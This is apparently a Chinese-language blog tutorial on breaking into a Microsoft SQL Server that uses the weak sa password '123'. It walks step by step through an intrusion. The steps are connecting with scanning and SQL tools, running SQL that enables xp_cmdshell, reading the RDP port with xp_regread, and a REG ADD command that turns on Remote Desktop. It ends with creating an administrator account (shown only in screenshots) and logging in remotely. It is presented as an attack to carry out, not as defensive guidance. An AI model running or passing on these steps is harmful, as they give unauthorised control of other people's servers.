使用SQL弱口令***SQL服务器

使用的工具:扫描工具X-scan

                        SQL查询分析器

                        SQLtools命令集成版

工具下载地址:http://down.51cto.com/data/211962

环境:Windows xp和Windows Server 2003企业版

1、在网络内扫描到一台SQL Server服务器,且sa密码为弱口令123

2、通过 SQLtools命令集成版这个软件,我们可以连上这台SQL Server服务器,如下图所示

使用SQL弱口令***SQL服务器_第1张图片

3、虽然我们能succeed连接到SQL Server服务器,但是在我们执行dir c:\查看c盘文件时候,可能会报错,基于这种情况,我们可以使用SQL 查询分析器,修正该错误信息

4、打开SQL Server查询分析器,输入IP地址和sa帐号及密码

使用SQL弱口令***SQL服务器_第2张图片

5、在查询分析器里输入SQL语句,并执行

SQL语句:

;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure   'show advanced options', 0 --

使用SQL弱口令***SQL服务器_第3张图片

6、这时,我们在执行dir c:\命令查看c盘下的文件,查询成功

使用SQL弱口令***SQL服务器_第4张图片

7、在SQLtools工具的dos命令窗口,执行netstat -an查看3389端口是否打开

使用SQL弱口令***SQL服务器_第5张图片

8、同时使用SQL命令需要查询默认的3389端口是否已经被更改

SQl命令查询3389端口是否被更改:

exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'

使用SQL弱口令***SQL服务器_第6张图片

9、很显然,默认3389端口没有被修改,那么我们就可以执行dos命令,开启SQL Server服务器的3389端口

DOS命令:

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

使用SQL弱口令***SQL服务器_第7张图片

10、再次查询SQl Server的3389端口是否已经打开

       (很明显我们已经成功开启对方的3389端口)

使用SQL弱口令***SQL服务器_第8张图片

11、这时我们可以使用我们熟悉的dos命令对该SQL Server服务器新建用户,并加入到Administrators组

使用SQL弱口令***SQL服务器_第9张图片

使用SQL弱口令***SQL服务器_第10张图片

12、现在,我们就可以是用远程桌面连接这台SQL Server服务器了

使用SQL弱口令***SQL服务器_第11张图片 

备注:

一:现在的SQL Server服务器弱口令,个人感觉扫描到的几率微乎其微

二:如果对方没开启远程桌面,那么即使建立了自己的帐号,岂不也只能望而兴叹

三:如果对方开启了远程桌面,但是设置了IPsec策略,仅运行特定的IP段或IP地址访问,那么......